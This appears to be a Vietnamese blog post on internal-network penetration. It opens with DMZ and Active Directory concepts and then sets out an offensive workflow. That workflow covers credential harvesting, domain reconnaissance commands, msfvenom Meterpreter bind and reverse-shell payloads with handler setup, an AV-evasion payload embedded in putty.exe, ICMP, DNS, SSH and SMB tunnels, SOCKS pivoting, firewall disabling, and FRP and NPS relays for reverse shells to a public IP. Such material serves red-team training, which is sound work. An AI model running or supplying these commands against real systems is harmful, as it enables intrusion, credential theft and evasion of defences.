Tổng Kiến Thức Bảo Mật Mạng Nội Bộ

Giới Thiệu Khái Niệm

DMZ (Khu Vực Trung Gian)

DMZ (Demilitarized Zone) là không gian nằm giữa hai tường lửa. So với Internet, DMZ cung cấp mức độ bảo mật cao hơn, nhưng thấp hơn so với mạng nội bộ.

DMZ là viết tắt của "demilitarized zone", được dịch sang tiếng Việt là "khu vực trung gian" hoặc "khu phi quân sự". Nó được thiết lập để giải quyết vấn đề người dùng từ mạng bên ngoài không thể truy cập các máy chủ mạng nội bộ sau khi cài đặt tường lửa. DMZ là một mạng nhỏ nằm giữa mạng nội bộ và mạng bên ngoài, nơi có thể đặt các máy chủ cần công khai như máy chủ web, FTP, diễn đàn, v.v. Cấu hình mạng này giúp bảo vệ hiệu quả hơn cho mạng nội bộ, vì nó tạo thêm một rào cản đối với kẻ tấn công từ bên ngoài.

Nhóm Làm Việc (Work Group)

Nhóm làm việc (Work Group) là một khái niệm trong mạng máy tính và là mô hình quản lý tài nguyên phổ biến nhất.

Các máy tính được phân loại theo chức năng hoặc phòng ban vào các nhóm khác nhau. Bằng cách tạo các nhóm làm việc khác nhau, các máy tính có thể được phân loại theo chức năng hoặc phòng ban, giúp mạng của toàn bộ tổ chức trở nên có cấu trúc phân cấp.

Chỉ cần tìm nhóm làm việc tương ứng trong "láng giềng mạng" của máy tính, người dùng có thể phát hiện tất cả các máy tính chứa trong đó và truy cập tài nguyên tương ứng.

Để tham gia hoặc tạo một nhóm làm việc rất đơn giản. Chỉ cần nhấp chuột phải vào biểu tượng "Máy tính" (hoặc "Máy tính này") trên màn hình hình nền, chọn "Thuộc tính" trong menu ngữ cảnh, nhấp "Thay đổi cài đặt" trong hộp thoại hiện ra, sau đó nhấp "Thay đổi" trong hộp thoại "Thuộc tính hệ thống", nhập tên tùy chỉnh vào ô "Tên máy tính" và tên nhóm làm việc cần tham gia vào ô "Nhóm làm việc", sau đó nhấp "OK" và khởi động lại máy tính. Lưu ý, nếu nhóm làm việc được chỉ định không tồn tại, một nhóm làm việc mới sẽ được tạo.

Mặc định, các máy tính trong mạng LAN đều sử dụng phương thức quản lý tài nguyên theo nhóm làm việc, tức là thuộc nhóm có tên WORKGROUP.

Khác Biệt Giữa Nhóm Làm Việc và Miền (Domain)

  • Nhóm làm việc có phạm vi nhỏ, không cần quản lý máy chủ
  • Môi trường miền có phạm vi lớn, số lượng máy chủ nhiều, cần có máy chủ quản lý

Máy Chủ Miền (Domain Controller - DC)

Máy chủ miền là máy chủ trong môi trường "miền" có trách nhiệm xác thực từng máy tính và người dùng kết nối vào mạng, tương tự như người bảo vệ tại một đơn vị. Nó được gọi là "máy chủ miền" (Domain Controller, viết tắt là DC).

Thông thường là máy chủ quản lý trong môi trường miền, có quyền hạn lớn.

Thư Mục Hoạt Động (Active Directory - AD)

Nó cung cấp một phương pháp mạnh mẽ để quản lý định danh và mối quan hệ của các thành tố trong môi trường mạng.

Active Directory chủ yếu cung cấp các chức năng sau:

  • Dịch vụ mạng cơ bản: bao gồm DNS, WINS, DHCP, dịch vụ chứng thực, v.v.
  • Quản lý máy chủ và máy khách: quản lý tài khoản máy chủ và máy khách, tất cả máy chủ và máy khách tham gia miền và thực thi chính sách nhóm.
  • Dịch vụ người dùng: quản lý tài khoản miền, thông tin người dùng, danh bạ doanh nghiệp (tích hợp với hệ thống email), quản lý nhóm người dùng, xác thực danh tính, quản lý ủy quyền, v.v., thực thi chính sách quản lý nhóm theo nhu cầu.
  • Quản lý tài nguyên: quản lý máy in, chia sẻ tệp và các tài nguyên mạng khác.
  • Cấu hình máy tính để bàn: quản trị viên có thể tập trung cấu hình các chính sách máy tính để bàn khác nhau, như giới hạn chức năng giao diện, giới hạn đặc điểm thực thi ứng dụng, giới hạn kết nối mạng, giới hạn cấu hình bảo mật, v.v.
  • Hỗ trợ ứng dụng: hỗ trợ hệ thống tài chính, nhân sự, email, cổng thông tin doanh nghiệp, tự động hóa văn phòng, quản lý bản vá, hệ thống chống virus và nhiều ứng dụng khác.

Một Miền (Single Domain)

Một miền là môi trường mạng chỉ có một miền. Trong một tổ chức có quy mô nhỏ, số lượng máy tính ít và vị trí địa lý cố định, việc thiết lập một miền riêng là đủ để đáp ứng nhu cầu.

Mẹ và Con (Parent and Child Domains)

Trong mạng, khi chia thành nhiều miền, miền đầu tiên được gọi là miền mẹ, các miền của các chi nhánh được gọi là miền con của miền đó. Trong cùng một miền, số lượng mục tương tác lớn và không bị nén, giữa các miền khác nhau, số lượng mục tương tác tương đối ít và có thể được nén. Mỗi miền có chính sách bảo mật riêng.

Cây Miền (Domain Tree)

Cây miền là tập hợp gồm nhiều miền được liên kết với nhau bằng mối quan hệ tin cậy.

Rừng Miền (Domain Forest)

Rừng miền là tập hợp gồm nhiều cây miền được liên kết với nhau bằng mối quan hệ tin cậy.

Thu Thập Thông Tin

Rò Rỉ Thông Tin Nhạy Cảm

Thu thập mật khẩu từ các dịch vụ giao thức máy tính khác nhau - LaZagne (tất cả), xenArmor (Windows), plugin Cobalt Strike

  1. Tệp sao lưu mã nguồn trang web, tệp sao lưu cơ sở dữ liệu, v.v.
  2. Các cổng quản lý web cơ sở dữ liệu khác nhau, như PHPMyAdmin
  3. Mật khẩu đã lưu trong trình duyệt, cookie trình duyệt
  4. Phiên làm việc của người dùng khác, bản ghi kết nối 3389 và ipc$, nội dung thùng rác
  5. Mật khẩu WIFI đã lưu của Windows
  6. Các tài khoản và mật khẩu khác trong mạng nội bộ, như: Email, VPN, FTP, OA, v.v.

Thông Tin Cơ Bản Máy Tính

Mục tiêu là hiểu thông tin cơ bản của máy chủ hiện tại, để chuẩn bị cho việc xác định vai trò máy chủ, môi trường mạng, v.v. trong các bước tiếp theo.

  • systeminfo - thông tin chi tiết
  • net start - dịch vụ đang khởi động
  • tasklist - danh sách tiến trình
  • schtasks - công việc được lên lịch

Thu Thập Thông Tin Mạng

Mục tiêu là hiểu thông tin giao diện mạng của máy chủ hiện tại, để chuẩn bị cho việc xác định vai trò, chức năng, kiến trúc mạng hiện tại.

  • ipconfig /all - xác định xem có miền không (DNS)
    Có mục "DNS hậu tố chính" cho biết có môi trường miền.
  • net view /domain - xác định xem có miền không
    Hiển thị phản hồi của miền.
  • net time /domain - xác định miền chủ
    Có thể sử dụng nslookup và ping để phát hiện địa chỉ IP của máy chủ.
    Thông thường thời gian sẽ được đồng bộ với thời gian của máy chủ miền, vì vậy thời gian trong hình là thời gian của máy chủ miền.
  • netstat -ano - các cổng mạng hiện tại đang mở
  • nslookup tên miền - theo dõi địa chỉ nguồn
    Có thể sử dụng ping để theo dõi.

Thu Thập Thông Tin Người Dùng

Mục tiêu là hiểu thông tin người dùng và nhóm người dùng trên máy tính hoặc trong môi trường miền, để sử dụng thông tin xác thực cho kiểm tra sau này.

Người dùng mặc định phổ biến:

  • Domain Admins - Quản trị viên miền (mặc định có quyền kiểm soát đầy đủ đối với máy chủ miền)
  • Domain Computers - Máy trong miền
  • Domain Controllers - Máy chủ miền
  • Domain Guest - Khách miền, quyền hạn thấp
  • Domain Users - Người dùng miền
  • Enterprise Admins - Người dùng quản trị hệ thống doanh nghiệp (mặc định có quyền kiểm soát đầy đủ đối với máy chủ miền)

Các lệnh thu thập thông tin người dùng liên quan:

  • whoami /all - quyền người dùng
  • net config workstation - thông tin đăng nhập
  • net user - người dùng cục bộ
  • net localgroup - nhóm người dùng cục bộ
  • net user /domain - thông tin người dùng miền
  • net group /domain - thông tin nhóm người dùng miền
  • wmic useraccount get /all - thông tin chi tiết người dùng miền
  • net group "Domain Admins" /domain - truy vấn tài khoản quản trị viên miền
  • net group "Enterprise Admins" /domain - truy vấn nhóm quản trị viên
  • net group "Domain Controllers" /domain - truy vấn máy chủ miền

Thu Thập Thông Tin Xác Thực

Mục tiêu là thu thập các mật mã, văn bản rõ, mật khẩu, v.v., để chuẩn bị cho kiểm tra xâm ngang ngang hàng sau này.

  1. Tệp sao lưu mã nguồn trang web, tệp sao lưu cơ sở dữ liệu, v.v.
  2. Các cổng quản lý web cơ sở dữ liệu khác nhau, như PHPMyAdmin
  3. Mật khẩu đã lưu trong trình duyệt, cookie trình duyệt
  4. Phiên làm việc của người dùng khác, bản ghi kết nối 3389 và ipc$, nội dung thùng rác
  5. Mật khẩu WIFI đã lưu của Windows
  6. Các tài khoản và mật khẩu khác trong mạng nội bộ, như: Email, VPN, FTP, OA, v.v.

Dò Tìm Thông Tin Máy Chủ Miền và Địa Chỉ

net time /domain nslookyp ping

Dò Tìm Máy Chủ Hoạt Động Trong Miền và Địa Chỉ

Công cụ bên thứ ba
nbtscan 192.168.3.0/24 - công cụ bên thứ ba (không có bypass, cần tải về trên máy trong miền)

Lệnh tích hợp

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.3.%I | findstr "TTL="

Sử dụng lệnh tích hợp, không dễ bị chặn.

Script PowerShell bên thứ ba
nishang empire

Nishang

Chạy với quyền quản trị viên

Nhập mô-đun nishang

Import-Module .\nishang.psm1

Thiết lập chính sách thực thi

Set-ExecutionPolicy RemoteSigned

Enter liên tục

Nhận hàm lệnh của mô-đun nishang

Get-Command -Module nishang

Nhận thông tin máy tính thông thường

Get-Information

Quét cổng (xem tệp trong thư mục tương ứng để cú pháp minh họa, các tính năng khác tương tự)

Invoke-Portscan -StartAddress 192.168.3.0 -EndAddress 192.168.3.100 -ResolveHost -ScanPort

Tính năng khác: xóa bản vá, shell ngược, thu thập xác thực, v.v.

Công Nghệ Đường Hầm

Khác Biệt Giữa Đường Hầm và Proxy

Công nghệ đường hầm: Giải quyết vấn đề kết nối lên mạng với các giao thức bị chặn (sử dụng giao thức có thể kết nối lên mạng để đóng gói và kết nối). Có thể hiểu là có tường lửa, phần mềm bảo vệ, v.v. hạn chế khiến một số giao thức không thể giao tiếp bình thường.

Công nghệ proxy: Giải quyết vấn đề giao tiếp mạng bị gián đoạn (sử dụng máy trung gian để tạo nút và các hoạt động tiếp theo). Có thể hiểu là các mạng đoạn khác nhau không thể giao tiếp.

Kết nối xuôi (Forward Connection) (dùng khi quy tắc ra bị hạn chế, máy chủ chủ động kết nối với máy bị kiểm soát, gửi yêu cầu vào trong)

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.63.135 lport=6666 -f exe -o test.exe

Kết nối ngược (Reverse Connection) (dùng khi quy tắc vào bị hạn chế, chủ động kết nối với máy bị kiểm soát, gửi yêu cầu ra ngoài)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.134 lport=9999 -f exe -o demo2.exe

Thời Điểm Sử Dụng

Máy chủ chặn TCP ra, không chặn vào, không có mạng Internet
Kết nối xuôi (lấy quyền một máy chủ có thể giao tiếp với máy chủ và có mạng) - Máy chủ có mạng chủ động kiểm soát máy bị kiểm soát.

Máy chủ chặn TCP ra, không chặn vào, có mạng Internet
Kết nối xuôi (lấy quyền một máy chủ có thể giao tiếp với máy chủ và có mạng) - Máy chủ có mạng chủ động kiểm soát máy bị kiểm soát.
Công nghệ đường hầm (sử dụng các giao thức khác để ra mạng).

Đóng Gói Giao Thức ICMP

Khi máy chủ đích có thể ping ra ngoài nhưng bị tắt http, có thể sử dụng giao thức ICMP để đóng gói và đi đường hầm.

Quy trình:

  1. Tạo backdoor cục bộ
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.200.134 lport=9999 -f exe -o demo2.exe
  1. MSF bắt đầu lắng nghe:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
exploit
  1. Kali bật đường hầm
./pingtunnel -type server

Windows bật đường hầm // Chuyển tiếp dữ liệu giao thức icmp từ cục bộ 3333 đến cổng 4444 của 66ip (chạy với quyền quản trị viên)

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.46.66 -t 192.168.46.66:4444 -tcp -noprint 1 -nolog 1

Giao Tiếp Đường Hầm DNS

Xác định: nslookup dig

Máy chủ trong mạng chỉ có thể gửi dữ liệu giao thức DNS ra ngoài, giải quyết vấn đề giao tiếp.

Địa chỉ công cụ: https://github.com/yarrick/iodine

Xác định có thể ra ngoài: nslookup www.baidu.com

--- Máy chủ công cộng: Đặt mật khẩu xiaodi và tạo IP ảo cũng như liên kết tên miền

iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD

--- Máy khách đích: Kết nối mật khẩu xiaodi và liên kết tên miền

iodine -f -M -P xiaodi ns1.xiaodi8.com

--- Thử giao tiếp và kết nối

ssh root@192.168.0.2

Đường Hầm SSH

Bật đăng nhập giao thức SSH

vim /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

Cục bộ: Chặn ra

ssh -CFNg -L 1122:192.168.1.15:8080 root@192.168.1.166
curl http://127.0.0.1:1122

Remote: Chặn vào

ssh -CFNg -R 1234:192.168.1.15:8080 root@47.94.236.117
curl http://127.0.0.1:1234

Công Nghệ Proxy

Proxy SOCKS

SOCKS4/4a SOCKS5

Phần mềm proxy

SocksCap, Proxifier, ProxyChains, v.v.

Proxifier

Đầu tiên tạo proxy SOCKS trong Cobalt Strike

Sao chép cổng

Mở Proxifier

Điền dữ liệu theo thứ tự

Phiên bản SOCKS theo phiên bản do CS tạo

Điền xong nhấp check để kiểm tra kết nối

Nếu kiểm bị treo, nhấp Test Settings ở góc trên bên phải

Phương pháp đầu tiên chỉ khởi động kiểm tra đầu tiên

Phương pháp thứ hai

Thiết lập chính xác IP mạng nội bộ đích

Thiết lập xong rồi kiểm tra lại là thành công

Sau đó thiết lập Rules

Thêm như sau

Sau đó chọn localhost, nhấp remove để xóa quy tắc localhost, chỉ để lại hai cái

Nhấp OK

Sau khi cấu hình xong, sử dụng Firefox có thể truy cập cổng mở của máy chủ mạng nội bộ đích

Giao Tiếp MSF

Proxy SOCKS

1. Thêm đường dẫn, giới hạn trong MSF

Xem thông tin đường dẫn

run autoroute -p
run post/multi/manage/autoroute

Thêm đường dẫn chỉ định, 1 là số nhận của session

route add 192.168.11.0 255.255.255.0 1

2. Proxy SOCKS, sử dụng chung toàn cục

use auxiliary/server/socks_proxy
set VERSION 4a  (thay đổi theo thực tế)
set srvhost 0.0.0.0
set srvport 1115
run

Bắt đầu proxy, cấu hình proxy SOCKS

MSF + proxychains

Tạo đường dẫn

run post/multi/manage/autoroute

Xem đường dẫn

run autoroute -p

Quay lại MSF

Sử dụng auxiliary/server/socks_proxy module, xem options và điền tham số tương ứng

use auxiliary/server/socks_proxy
options
set VERSION 4a
run

Sau khi run sẽ treo một job, có thể xem tình trạng treo bằng lệnh

jobs

Cài đặt proxychains4

apt install proxychains4

Cấu hình tệp proxychains, IP và lệnh trong tệp cấu hình phải giống như trong module

vim /etc/proxychains4.conf

Lưu xong, xem có thể nhận được trang web qua IP mạng nội bộ không

proxychains4 curl http://192.168.52.143/phpmyadmin

Giao Tiếp CS

Lệnh: socks 59578

Thao tác: Chuyển tiếp proxy ---> Proxy SOCKS

Backdoor Xuôi và Ngược

Xuôi
Sau khi backdoor thực thi, dữ liệu được gửi đến cổng 2222 cục bộ, bộ điều khiển kết nối đến cổng 2222 hiện tại.

Ngược
Sau khi backdoor thực thi, dữ liệu được gửi đến cổng 2222 từ xa, bộ điều khiển lắng nghe cổng 2222.

Điều Khiển Lên Dòng MSF (Xuôi)

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=1234 -f exe > 1.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.11.129
set lport 3333
run

Bypass

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.93.87.217 LPORT=3333 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o aaa.exe

Điều Khiển Lên Dòng CS (Xuôi)

Nghe: bind_tcp port

Sử dụng proxy SOCKS

Lệnh: connect ip port

Thiết lập nghe mới

Sử dụng module cuối cùng để tấn công

Tải lên và thực thi trojan

Sau khi thực thi CS không trực tiếp lên dòng

Cần nhập lệnh trên máy đã lên dòng

connect ip port  (ip và cổng CS tạo backdoor lúc trước)

Chờ một lúc, máy sẽ lên dòng

Lọc Lên Dòng Vào và Ra

Lọc Lên Dòng Vào

Môi trường mạng như hình

Ý tưởng: Lên dòng windows7 --- Kết nối xuôi --- Lên dòng windows10 --- windows2008 kết nối ngược windows10 --- windows2008 đi đường hầm SMB kết nối xuôi windows2012

Công Nghệ Đường Hầm

HTTP/S, DNS, SSH, ICMP, SMB, v.v. xuyên tường

Đường hầm SMB lên dòng

Tình huống

Tường lửa chặn tất cả cảng giao thức, chỉ mở SMB có thể kết nối máy in

Giao thức SMB

Giao thức chia sẻ tệp, dùng cho cổng 445, thường dùng cho máy in

Tạo SMB listener, tạo đường ống

Sử dụng máy bị kiểm soát quét và dò tìm máy đích, xem có cổng 445 không

Sau khi quét, xem danh sách mục tiêu

Xu hiện máy đích

Chọn máy đích để di chuyển ngang

Cuối cùng lên dòng (chưa cấu hình tốt môi trường, dùng hình của tổng đế thay thế) và vẫn là system, di chuyển ngang自带提权

Đường hầm DNS lên dòng

Tình huống

Nguyên lý

DNS khi truyền vùng dùng TCP

DNS khi phân giải tên miền dùng UDP

Nếu tường lửa tắt TCP, UDP vẫn có thể dùng

Tình huống áp dụng

Máy đích có thể ping www.baidu.com (dùng ICMP)

Nhưng máy đích không thể truy cập trang web Baidu (tường lửa chặn giao tiếp TCP)

Máy đích có thể phân giải www.baidu.com qua nslookup (giao thức DNS có thể giao tiếp)

Điều kiện sử dụng

Cần chuẩn bị tên miền

Sau khi lên dòng, nhập lệnh

mode dns-txt

Lên dòng thành công

Bỏ Qua Kết Nối Ngược

Đầu tiên chuyển tiếp proxy của máy bị kiểm soát

Máy nghe cần đổi thành IP cùng đoạn mạng có thể giao tiếp với IP mạng nội bộ khác, đảm bảo kết nối mạng

Sau đó tạo trojan

Cuối cùng thực thi trojan để lên dòng

Tắt & Xóa & Thay Thế

Áp dụng cho môi trường mạng nội bộ đơn thuần, môi trường miền nội bộ đơn thuần (máy chủ miền không đặt chính sách tường lửa đồng bộ)

Trong trường hợp có quyền quản trị viên, sử dụng lệnh tắt tường lửa, xóa chính sách tường lửa, thay thế chương trình tường lửa

Lệnh thao tác tường lửa Windows

Hỗ Trợ Hệ Thống Linux MAC IOS Android Lên Dòng

Plugin

https://github.com/gloxec/CrossC2

Tham khảo sử dụng

https://gloxec.github.io/CrossC2/zh_cn

Phiên bản hiện tại chỉ hỗ trợ https ngược và tcp xuôi

  1. Tải xuống phiên bản tương ứng của loader và plugin CNA
  2. Tải lên tệp loader và tải plugin CNA cục bộ
  3. Thay đổi đường dẫn cấu hình plugin CNA và tải lên tệp key
  4. Sử dụng lệnh hoặc plugin để liên kết listener HTTPS và tạo

Xuyên Tường Mạng Nội Bộ

Dự Án Xuyên Tường

Ưu điểm: Mã hóa dữ liệu xuyên tường, nền tảng trung gian, chống theo dõi, giải quyết vấn đề mạng

Ngrok (dành cho người mới) không khuyến nghị

https://www.ngrok.cc

frp (đơn giản)

https://github.com/fatedierfrp

spp (tùy chỉnh)

https://github.com/esrrhs/spp

nps (giao thức đặc biệt)

https://github.com/ehang-io/nps

EW (ngừng cập nhật)

http://www.rootkiter.com/EarthWorm

FRP

Máy chủ - tải xuống - giải nén - sửa đổi - khởi động (cấu hình an toàn nhập xuất của máy chủ Alibaba Cloud)

Máy chủ sửa đổi tệp cấu hình frps.ini

[common]
bind_port=7000

Khởi động máy chủ

./frps -c ./frps.ini

Máy điều khiển - tải xuống - giải nén - sửa đổi - khởi động

Máy điều khiển sửa đổi tệp cấu hình frpc.ini

[common]
server_add=xx.xx.xx.xx (IP công cộng)
server_ip=7000 	#cổng làm việc của frpc, phải giống frps ở trên
[ssh]
type=tcp
local_ip=127.0.0.1
local_port=5555		#chuyển tiếp đến cục bộ 5555
remote_port=6000	#cổng 6000 của máy chủ chuyển tiếp đến cục bộ

Khởi động máy khách

./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx(IP công cộng) lport=6000 -f exe -o a.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

NPS

Máy chủ

Khởi động

./nps install
./nps
http://ip:8024 admin/123

Tạo máy khách, tạo khóa

Thêm đường hầm giao thức, liên kết hướng đến

Liên kết từ xa 5555, hướng đến cục bộ 6666

Máy khách

  1. Kết nối máy chủ
./nps -server=xx.xx.xx.xx:8024(IP công cộng) -vkey=uajwhbu9155qh8 9v
    >Tạo backdoor
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx(IP công cộng) lport=5555 -f exe -o nps.exe
    >Nghe backdoor
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run

SPP

Máy chủ

./spp -type server -proto ricmp -listen 0.0.0.0

Máy khách

spp -name "test" -type proxy_client -server xx.xx.xx.xx(IP công cộng) -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

CS

Listener 1:

http xx.xx.xx.xx (IP công cộng) 8081

Listener 2:

http 127.0.0.1 8082

Tạo backdoor: Listener 2

Thẻ: bảo mật mạng nội bộ DMZ miền Active Directory thu thập thông tin

Đăng vào ngày 21 tháng 5 lúc 12:09